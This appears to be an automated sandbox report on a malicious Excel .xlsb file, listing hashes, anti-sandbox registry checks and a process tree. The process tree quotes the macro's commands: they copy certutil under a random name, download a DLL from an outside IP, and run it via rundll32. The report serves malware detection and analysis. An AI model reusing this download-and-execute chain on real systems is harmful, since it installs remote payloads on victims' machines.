Analysis
max time kernel: 148s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-02-2024 06:13
Behavioral task: behavioral1
Sample: ade047b047a762846f7df54eed3dd90a.xlsb
Resource: win7-20240221-en
Behavioral task: behavioral2
Sample: ade047b047a762846f7df54eed3dd90a.xlsb
Resource: win10v2004-20240226-en
General
Target: ade047b047a762846f7df54eed3dd90a.xlsb
Size: 157KB
MD5: ade047b047a762846f7df54eed3dd90a
SHA1: d14e19640dbed65b96ce6a3881261f5fb9335874
SHA256: 42ee070ac0de1e32e2f436764560c31655f0e81aeb2f842a895cca3405fb2c7f
SHA512: 6fde7aface8e173641a4a8519a7f3095b01417a470508ab5506f3843b93656b1cd7449e31c537e159ae863c9baea4a7a6de6b9c8a710cee35c289d5b42e3b0fc
SSDEEP: 3072:TALCFzv4iOuXHPoDIniT5gg8JiaFpSA+gyLe:TLzFrHA8ez8rSA+ry
Malware Config
Extracted
Signatures
Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe, cmd.exe, cmd.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2892 | 2852 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2268 | 2852 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3828 | 2852 | cmd.exe | EXCEL.EXE

Executes dropped EXE (1 IoCs)
Processes: vWJpojwO.exe
pid | process
3548 | vWJpojwO.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: EXCEL.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes: EXCEL.EXE
pid | process
2852 | EXCEL.EXE

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: EXCEL.EXE
pid | process
2852 | EXCEL.EXE (2 occurrences)

Suspicious use of SetWindowsHookEx (14 IoCs)
Processes: EXCEL.EXE
pid | process
2852 | EXCEL.EXE (14 occurrences)

Suspicious use of WriteProcessMemory (10 IoCs)
Processes: EXCEL.EXE, cmd.exe, cmd.exe
description | pid | process | target process
PID 2852 wrote to memory of 2892 | 2852 | EXCEL.EXE | cmd.exe
PID 2852 wrote to memory of 2892 | 2852 | EXCEL.EXE | cmd.exe
PID 2852 wrote to memory of 2268 | 2852 | EXCEL.EXE | cmd.exe
PID 2852 wrote to memory of 2268 | 2852 | EXCEL.EXE | cmd.exe
PID 2268 wrote to memory of 3548 | 2268 | cmd.exe | vWJpojwO.exe
PID 2268 wrote to memory of 3548 | 2268 | cmd.exe | vWJpojwO.exe
PID 2852 wrote to memory of 3828 | 2852 | EXCEL.EXE | cmd.exe
PID 2852 wrote to memory of 3828 | 2852 | EXCEL.EXE | cmd.exe
PID 3828 wrote to memory of 4200 | 3828 | cmd.exe | rundll32.exe
PID 3828 wrote to memory of 4200 | 3828 | cmd.exe | rundll32.exe
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ade047b047a762846f7df54eed3dd90a.xlsb"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 2852

C:\Windows\System32\cmd.exe (depth 2)
Command line: "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\vWJpojwO && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\vWJpojwO\vWJpojwO.exe
- Process spawned unexpected child process
PID: 2892

C:\Windows\System32\cmd.exe (depth 2)
Command line: "C:\Windows\System32\cmd.exe" /c c:\programdata\vWJpojwO\vWJpojwO.exe -urlcache -f -split http://141.136.0.170 c:\programdata\vWJpojwO\vWJpojwO.dll
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID: 2268

\??\c:\programdata\vWJpojwO\vWJpojwO.exe (depth 3)
Command line: c:\programdata\vWJpojwO\vWJpojwO.exe -urlcache -f -split http://141.136.0.170 c:\programdata\vWJpojwO\vWJpojwO.dll
- Executes dropped EXE
PID: 3548

C:\Windows\System32\cmd.exe (depth 2)
Command line: "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\vWJpojwO\vWJpojwO.dll,GlobalOut
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID: 3828

C:\Windows\system32\rundll32.exe (depth 3)
Command line: rundll32 C:\ProgramData\vWJpojwO\vWJpojwO.dll,GlobalOut
PID: 4200
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 1.6MB
MD5: bd8d9943a9b1def98eb83e0fa48796c2
SHA1: 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256: 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512: 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b